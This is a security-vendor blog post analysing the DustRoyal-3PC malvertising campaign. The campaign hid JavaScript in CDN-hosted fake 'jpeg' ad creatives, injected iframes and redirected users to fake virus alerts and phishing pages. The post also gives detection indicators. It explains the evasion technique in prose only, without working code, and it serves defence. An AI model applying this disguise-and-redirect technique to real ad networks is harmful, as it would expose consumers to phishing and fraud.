Redirect Rampage Released Via Cloud Storage

Redirect Rampage Released Via Cloud Storage
featured image

DustRoyal-3PC redirect influx hides behind CDNs

The use of hacked brand websites and landing pages as malware delivery vectors continues to grow, but that doesn’t mean redirects via ad tags are stagnating. Indeed, they appear to be evolving to better evade detection and creative-blocking technology.

Rather than cycling through domains, threat actors are using creative image files in cloud storage to evade detection and bypass domain-oriented blocking tools. (Who’s going to block a CDN/content distribution network? No one.) Extensive investigation is required to identify rogue CDN-hosted URLs and shut down attacks.

That’s just what happened in early 2023 when The Media Trust Digital Security and Operations (DSO) team identified and terminated a widespread malicious ad campaign that used CDNs as a payload delivery path. Generating dozens of incidents affecting consumers around the world—particularly in Canada, Germany, Japan and the US—the ad tag call chain included both a normal “jpg” and a malicious “jpeg” URL. Under the right conditions, the malicious URL redirects to fake virus alerts, phishing scams, and other malicious landing pages, harming the digital experience for thousands of consumers.

Uncovering the DustRoyal threat

The phishing-oriented attack, dubbed DustRoyal-3PC (DustRoyal), is the latest evolution in malvertising using cloud-hosted creative files. Two key attributes led to the detection of the malvertising campaign: inconsistent file sizes and JavaScript masquerading as image files.

In January, DSO detected several CDN-hosted URLs (most associated with CloudFront, a widely-used CDN) delivering suspiciously large image files relative to what is typically found in ad delivery. There were also discrepancies between the length and the size of the files, a strange inconsistency despite being delivered by the same URL in the same scan. [Figure 1]

Distinct differences in the size of the data delivered despite the identical URL structure

Figure 1: Note the differences in the size of the data delivered despite the identical URL structure

These “jpeg” files did not resolve upon manually loading the URL into a browser as expected with standard .jpg images. Upon further investigation, the source code delivered by these “jpegs” were not real images at all. Instead, the code hosted large JavaScript files wrapped in HTML script tags—including CSS attributes, most likely to help disguise the nature of the underlying code being delivered.

Makings of a Redirect Attack

The threat actors use an ad tag containing an image and the unnecessary JavaScript code that performs additional actions. The source URLs that are utilized by the malicious script appear innocuous. [Figure 2]

The ad tag code utilizing the malicious cloudfront hosts

Figure 2: The ad tag code utilizing the malicious cloudfront hosts

First, DustRoyal creates a link that points to a legitimate advertiser (https://www.ontheplussude[.]com) and includes a query string parameter “gclid” which is used to track the source of the traffic. The “target” attribute specifies that the link should open in a new browser tab or window when clicked.

Next the ad displays a source URL (jpg) to deliver a decoy creative (jpeg) via the “data-src” attribute. This decoy image is not displayed on the page because it has a “display:none” style attribute.

Finally, DustRoyal contains JavaScript code to fetch the “data-src” image URL and append a new HTML iframe element to the page. The iframe displays content from the fetch call’s response and it also includes a “data-znn” attribute (14814_ssssssssss99d1fe). [Figure 3]

The underlying redirection mechanism with iframe creation and content injection

Figure 3: The underlying redirection mechanism with iframe creation and content injection

In addition to creating a new iframe that loads content from the fetch call response, this JavaScript also removes the original link element from the page and initiates the redirect of unsuspecting users to fake virus alerts, phishing scams, and other malicious landing pages.

CDNs as a Front for Malvertising

Content delivery networks are used to deliver static and dynamic web content, video streams, APIs, and other web assets to users around the world without driving latency, slowing transfer speeds, or timing out. They store copies of your content in edge locations—data centers around the world—and route content requests to the edge location nearest to the user, which helps reduce the latency and improve the overall user experience.

Unfortunately, what makes CDNs such a great tool for business owners also means they can be used effectively in the distribution of malware by hosting malicious files. Common scenarios include:

  • Ad fraud: Cloud-based URLs to host ads are used to generate fraudulent clicks or impressions, which can be used to inflate the cost of advertising campaigns or generate revenue for the malvertiser.
  • Exploit kits: Hosting malicious ads that, when clicked, redirect to a page containing an exploit kit; i.e., tools that mine for vulnerabilities and/or to install malware on consumer devices.
  • Phishing attacks: When a user clicks on a phishing ad, they may be redirected to a fake website that looks like a legitimate site (e.g., a banking site) where they are prompted to enter their login credentials.

For now, DustRoyal relies on CloudFront, a widely used and trusted CDN. However, we’re on the lookout for this activity across other CDNs due to their ubiquity in today’s digital advertising supply chain. A CDN’s ability to easily generate and quickly distribute URLs make them attractive targets for cybercriminals who want to avoid detection and increase the effectiveness of their attacks.

Defending against a CDN-hosted malvertising attack

Similar to how GhostCat rapidly cycles through JavaScript hosted in cloud storage, DustRoyal cycles through CDN-hosted images. Under the right conditions, consumers are redirected to popups and fake advertising landing pages to phish for information.

While the initial campaign—affecting a handful of DSPs—was shut down within 11 days, new campaigns began emerging in late April across multiple DSPs, networks and publishers. It’s clear that the test period is over and the tactic is expanding to affect more parties. AdTech and publishers need to be aware of this evolving threat vector. An on-page/in-app blocker cannot block the whole cloud service. It requires more detective work to find the miscreant files.

Proper detection of the compromised/malicious CDN hosts and the code used by these malicious calls is essential for timely detection. The Media Trust specializes in detection of patterns used by malvertisers and has developed key signatures to detect these IOCs. In addition, ensure your creative blocking tool can functionally address the attacks occurring within injected iframes.


-Ad-tags that possess a “.jpeg” cloudfront url which do not resolve to images when manually visited
-Multiple calls to cloudfront hosts ending in “jpg” or “jpeg” format

IOCs (and counting)



* Naming Convention Note: Phishing attacks are represented by wind-related themes. Color represents the gravity of the threat using the ROYGBIV scale, where red signifies major and violet signifies minor impact. 3PC refers to the use of third-party code to distribute the malware; in this instance, it involves the use of CDNs to host malicious files used in the digital advertising ecosystem.